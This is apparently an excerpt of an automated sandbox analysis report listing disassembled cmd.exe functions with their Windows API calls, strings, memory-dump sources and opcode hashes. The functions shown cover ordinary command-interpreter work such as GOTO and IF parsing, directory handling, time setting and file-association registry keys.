                                                                                        • String ID: GOTO
                                                                                        • API String ID: 1380661413-1693823284
                                                                                        • Opcode ID: 5f34f5beae00755d735851141365c59f067702f5fa7fb964fa4b875c36b4a282
                                                                                        • Instruction ID: 9d5591703ef6ab94bd89f8f4d788840a997bb4000e782063c17d8a10f04b51e0
                                                                                        • Opcode Fuzzy Hash: 5f34f5beae00755d735851141365c59f067702f5fa7fb964fa4b875c36b4a282
                                                                                        • Instruction Fuzzy Hash: EAB19070A143018FDB20EF68D84472AB7E5EF84714F18592EE889D7291EB70DD85CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D73065 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 152COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                        • String ID: +-~!
                                                                                        • API String ID: 2191331888-2604099254
                                                                                        • Opcode ID: c7efd8978c691a87d61175f5461a8b08d7628cf34e3e9ee3f04357362d2155c8
                                                                                        • Instruction ID: f77d97066af33436f71ff176f57194cec691a19abef0873059be964ea8de5e47
                                                                                        • Opcode Fuzzy Hash: c7efd8978c691a87d61175f5461a8b08d7628cf34e3e9ee3f04357362d2155c8
                                                                                        • Instruction Fuzzy Hash: 37517972400209EFCB10DF68D8499EA37A5EF06320B54C526FC4A9B150FBB5DB00EBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D87220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • towupper.MSVCRT ref: 00D87277
                                                                                        • iswalpha.MSVCRT ref: 00D872AA
                                                                                        • towupper.MSVCRT ref: 00D872BD
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00D872EF
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D87304
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D87311
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                                        • String ID: $%04X-%04X$\
                                                                                        • API String ID: 4001382275-467840296
                                                                                        • Opcode ID: e3a5c24454928aaecce7cd29fbefbcb3f4d6f762485c02ecdf84e06529fdee47
                                                                                        • Instruction ID: 4df9cefd33029be69cb029668eef09c84dd00a46734c553d34640680bdefd886
                                                                                        • Opcode Fuzzy Hash: e3a5c24454928aaecce7cd29fbefbcb3f4d6f762485c02ecdf84e06529fdee47
                                                                                        • Instruction Fuzzy Hash: 7D41C572608310ABD720BBA59C0AA7B77ECEF99B10F18441EF999C61C0E770D940D7B6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D82D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00D83877), ref: 00D82D31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSingleWait
                                                                                        • String ID: wil
                                                                                        • API String ID: 24740636-1589926490
                                                                                        • Opcode ID: f3e30eef26a2315208e3b8fe3ebdf59c6a58039586d00f792a34de719539b56b
                                                                                        • Instruction ID: 4e5226904db07972c474ad2baaf99f16a143353aa1f0f467873c46c3bfc7ea80
                                                                                        • Opcode Fuzzy Hash: f3e30eef26a2315208e3b8fe3ebdf59c6a58039586d00f792a34de719539b56b
                                                                                        • Instruction Fuzzy Hash: 83318030304204ABEB21BB64CC89BBB3A6EEF41351F644536F882D6291D774CE51D7BA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8832A Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00D88360
                                                                                        • _ultoa.MSVCRT ref: 00D88376
                                                                                        • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00D8838B
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00D883A0
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00D883D8
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00D8840C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                        • String ID: (#$Application$System
                                                                                        • API String ID: 3377411628-593978566
                                                                                        • Opcode ID: 9aacf2bd71737e198e0b6ff75cff19076dee3e5d6e515819e7fc89ed287b8e8c
                                                                                        • Instruction ID: e610a3b012516e54d128b622978db725deb13649abf234fa583279ffbbc3f92d
                                                                                        • Opcode Fuzzy Hash: 9aacf2bd71737e198e0b6ff75cff19076dee3e5d6e515819e7fc89ed287b8e8c
                                                                                        • Instruction Fuzzy Hash: E7314D71A00308ABDB10DFA9DC44DAE7BB9EB49710F504229F911D7291EB709A05CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D75271 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D75294
                                                                                        • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D752A4
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81036
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81048
                                                                                        • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81064
                                                                                        • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81073
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                        • String ID: :$\
                                                                                        • API String ID: 3961617410-1166558509
                                                                                        • Opcode ID: 0ddce9f5eba17e032ffdeaeda6e38b53ee6a37beaaca9ffd612bb8d9e7b3a07f
                                                                                        • Instruction ID: 9ee1f291ac6fa22591e3059b0a8cbe05c847df950fa48cef405c83c19d4b3052
                                                                                        • Opcode Fuzzy Hash: 0ddce9f5eba17e032ffdeaeda6e38b53ee6a37beaaca9ffd612bb8d9e7b3a07f
                                                                                        • Instruction Fuzzy Hash: FF112C35900714AF8B206B38AC4857F777CEF467507098218E806D2299FBB1CC85D2BB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7161D Relevance: 15.4, APIs: 10, Instructions: 419COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D71665
                                                                                        • memset.MSVCRT ref: 00D71689
                                                                                        • memset.MSVCRT ref: 00D716AD
                                                                                        • memset.MSVCRT ref: 00D716D1
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D717CF
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D717E9
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D71801
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D71813
                                                                                          • Part of subcall function 00D7260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D72650
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                        • String ID:
                                                                                        • API String ID: 1034426908-0
                                                                                        • Opcode ID: be8fde1dd7a5da824b32db966c44aec3a72fd653f35adaa4c8d51d16808d3257
                                                                                        • Instruction ID: c67fde961efcbf721473102f7f530cc6ebcaa87142350ab04063ca448a6c37ad
                                                                                        • Opcode Fuzzy Hash: be8fde1dd7a5da824b32db966c44aec3a72fd653f35adaa4c8d51d16808d3257
                                                                                        • Instruction Fuzzy Hash: FFF16175A002199BDB249F29CC85BAAB7B5FF04304F1885A9E94DD7241EB30DE91CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D659C0 Relevance: 15.3, APIs: 10, Instructions: 270COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D65A10
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00D65A53
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D65A70
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D65A87
                                                                                          • Part of subcall function 00D70B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D70B40
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D65AA1
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D65B09
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D65B13
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D65B70
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D79B7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                                        • String ID:
                                                                                        • API String ID: 402963468-0
                                                                                        • Opcode ID: 446db97249c1e41f808ab0bb6f2563ca658cfb24cc700ec7943bcb565ffad08e
                                                                                        • Instruction ID: 7c008dbd9b11c55cfafc53d55bed6cfdc837778cb30d0e6b66f681a61668027f
                                                                                        • Opcode Fuzzy Hash: 446db97249c1e41f808ab0bb6f2563ca658cfb24cc700ec7943bcb565ffad08e
                                                                                        • Instruction Fuzzy Hash: 6591E532A016169BDB24DBA9EC95B7BB7B4EF89310F1881A5E509D7284F770DD80C770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D845F9 Relevance: 15.2, APIs: 10, Instructions: 150fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00D89E02,?,?,00D89E02), ref: 00D84618
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D84637
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9A7F0,00D89E02,?,00000000,?,00D89E02), ref: 00D84646
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D84653
                                                                                        • memcmp.MSVCRT ref: 00D84693
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00D89E02,00000000,?,00D89E02,?,00D89E02), ref: 00D84720
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00D89E02,00000000,00000000,?,00D89E02), ref: 00D84742
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D8474F
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F1,00000001,?,00000000,?,00D89E02), ref: 00D84764
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D84771
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2002953238-0
                                                                                        • Opcode ID: e1ecbba5548498613e17e04c88af20c713b24c9dc5421279d1eea4f64c3bb4b9
                                                                                        • Instruction ID: 741961609a9aa0ae6d1e6ec88786f5bfba79e0faff70b7eedd13ff604c9b69ab
                                                                                        • Opcode Fuzzy Hash: e1ecbba5548498613e17e04c88af20c713b24c9dc5421279d1eea4f64c3bb4b9
                                                                                        • Instruction Fuzzy Hash: C351D272A40306AFDB21AF68CC45BB9BBB9EF42710F18415AF855DB290E7718D40CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6C897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,00D9A7F0,00000000,?,00000200), ref: 00D6C818
                                                                                        • wcschr.MSVCRT ref: 00D6C882
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6C8BA
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6C8C4
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6C8DB
                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6C8ED
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00D6C90D
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D6C91E
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9A7F0,00000200,00000000,00000000), ref: 00D6C934
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D6C941
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6CAC4
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6CACE
                                                                                        • memcmp.MSVCRT ref: 00D7D16E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                        • String ID:
                                                                                        • API String ID: 1383533039-0
                                                                                        • Opcode ID: 4bf16a3ad9a696c11853781482a10f5c8d1238e8ad0d9e686b5cb9388a249ca6
                                                                                        • Instruction ID: 61adda91d603756380ada555cfda6d4841c11adbce0b2be6156509505d73302f
                                                                                        • Opcode Fuzzy Hash: 4bf16a3ad9a696c11853781482a10f5c8d1238e8ad0d9e686b5cb9388a249ca6
                                                                                        • Instruction Fuzzy Hash: 0D411671A103184BEB308B588C89BB977B6AF49300F58119AF40DD7290DBB58D91CFBA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D70444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                        • API String ID: 2081463915-1668778490
                                                                                        • Opcode ID: 99841dc4eb90c27503516fe1f8c3364404b81d192f0bfe186a3436037c544780
                                                                                        • Instruction ID: 754f7ba991d07dc67860ec331a07e4991b638ed046c04368037472cbfc45c36d
                                                                                        • Opcode Fuzzy Hash: 99841dc4eb90c27503516fe1f8c3364404b81d192f0bfe186a3436037c544780
                                                                                        • Instruction Fuzzy Hash: 36218871204706DBE7682B79A81673A6A98DB45364F68851EF489C11C1FFF5D840CB36
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69EF2 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 278COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_osfhandlememset
                                                                                        • String ID: DPATH
                                                                                        • API String ID: 3784859044-2010427443
                                                                                        • Opcode ID: dae0df5b1a763656e1a9d792b01128836201ecdbd6288709c06d47db46fc0542
                                                                                        • Instruction ID: a95e09a46d0929b08797cd8ad92d251b9b1f9f5b26a3a6e9df0450e3fb3d7b6e
                                                                                        • Opcode Fuzzy Hash: dae0df5b1a763656e1a9d792b01128836201ecdbd6288709c06d47db46fc0542
                                                                                        • Instruction Fuzzy Hash: E4A1D231A002019FCB24AF78CC5597AB7B5EF89724B18861DE49AE7294EB70EC41CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D84953 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 260timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D84A7B
                                                                                        • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00D84B98
                                                                                        • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00D84BC5
                                                                                        • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00D84BD2
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D84BDC
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D84C30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                        • String ID: %s$/-.
                                                                                        • API String ID: 1033501010-531045382
                                                                                        • Opcode ID: 8c82eda922a9bf37bf47119183cadec4ae0f3e48b70b7e2c3b02f4f5567f915f
                                                                                        • Instruction ID: 45fce863cb865cea265a1838d9369535b08f752661cc17258ece7eb84701700b
                                                                                        • Opcode Fuzzy Hash: 8c82eda922a9bf37bf47119183cadec4ae0f3e48b70b7e2c3b02f4f5567f915f
                                                                                        • Instruction Fuzzy Hash: 52810332A4021747DB28BB78CC45ABB73A9EF94710F58416AE402DB294EE71DE45CB38
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D86650 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00D86745
                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00D867CF
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D867F6
                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00D620B8,00000000,00000002,?,00000000), ref: 00D86867
                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00D868A3
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D868C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValue$CreateDeleteOpen
                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                        • API String ID: 4081037667-3301834661
                                                                                        • Opcode ID: 93ed6f861eab8c11b08233b9110493c00d9d0aaaab95fcae00e386dadbd68324
                                                                                        • Instruction ID: 69cd9839159c2d8ca4f76efb40112cb8d11468c7a9c37fa88d3b0a09f0e395a2
                                                                                        • Opcode Fuzzy Hash: 93ed6f861eab8c11b08233b9110493c00d9d0aaaab95fcae00e386dadbd68324
                                                                                        • Instruction Fuzzy Hash: 3C61FA759002259BDF34AB24CC49BBA77B8EF54710F1941AAF849E7290EA31CE44CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D864DB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D8650F
                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00), ref: 00D86545
